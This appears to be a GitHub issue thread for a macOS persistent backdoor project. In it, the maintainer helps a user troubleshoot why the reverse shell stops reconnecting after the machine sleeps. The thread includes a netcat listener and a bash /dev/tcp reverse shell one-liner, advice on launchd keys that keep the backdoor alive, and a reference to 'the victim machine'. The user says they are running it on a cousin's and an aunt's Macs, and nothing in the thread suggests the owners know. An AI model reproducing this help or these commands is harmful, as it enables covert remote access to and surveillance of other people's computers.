OSX-Peristant-BackDoor icon indicating copy to clipboard operation
OSX-Peristant-BackDoor copied to clipboard

Published 20 hours ago verified publisher icon mosca1337

StartInterval not working on Yosemite

Open theinvinciblesun opened this issue 10 years ago • 7 comments

The backdoor connects when the Mac is rebooted as per RunOnLoad for the first time but fails to connect on subsequent intervals if one exits the first session.

theinvinciblesun avatar Jan 12 '15 05:01 theinvinciblesun

I was not able to reproduce this on ProductName: Mac OS X ProductVersion: 10.10.3 BuildVersion: 14D54

I had the launch agent connect to myself locally. I killed the captured shell with Ctrl-C

nc -l 1337 bash -i >& /dev/tcp/localhost/1337 0>&1

Can you tell me more about this issue? Thanks

mosca1337 avatar Jan 12 '15 06:01 mosca1337

Well the backdoor connects to me when the computer is restarted. If the mac is put to sleep while the connection is alive and reawoken at a later while the connection does not connect back to me. While the mac was asleep i had also killed the connection from my side using kill command as the shell was non responsive. Its my cousins mac that I am experimenting on and so only available when I visit him. I ll try to get more details ASAP.

theinvinciblesun avatar Jan 12 '15 08:01 theinvinciblesun

Hmm you could try playing around with the keys in the launch agent plist. I believe that there may be some settings to "execute and forget", which may help with disconnects and sleeping computers.

Documentation and keys here: https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

Let me know what you find.

mosca1337 avatar Jan 13 '15 05:01 mosca1337

Hmm i tried using KeepAlive and ThrottleInterval keys but the issue persists. Again the Mac was put to sleep and the connection terminated by me whilst it was sleeping. I ll try other things over this week and report back

theinvinciblesun avatar Jan 13 '15 18:01 theinvinciblesun

Ok I have some clear picture on this. Once the mac is put to sleep while the connection is alive the process never restarts ever again using both StartInterval and the KeepAlive with ThrottleInterval keys. The only way it restarts is if one exits the shell whilst the mac is still awake.

theinvinciblesun avatar Jan 19 '15 18:01 theinvinciblesun

Interesting. It sounds as though the TCP connection "breaks" when the host falls asleep, however the process remains "alive". The LaunchAgent plist is set to keep the process alive, but it is probably not re-executed since the process hangs or simply stays alive.

Can you run launchctl list and find the process status on the victim machine? It would be interesting to know if the process simply remains alive after the machine goes to sleep or if the process exits with some failed return status.

mosca1337 avatar Jan 28 '15 00:01 mosca1337

Will. Just moved to a new city. My aunt has a macbook pro so i can experiment full time. Will do this and more tests tonite and revert back to you. It might be possible that the wait command causes problems. Not using the wait command and using the keepalive key instead in your original code might solve the problem. Will tell you tonight.

theinvinciblesun avatar Jan 30 '15 11:01 theinvinciblesun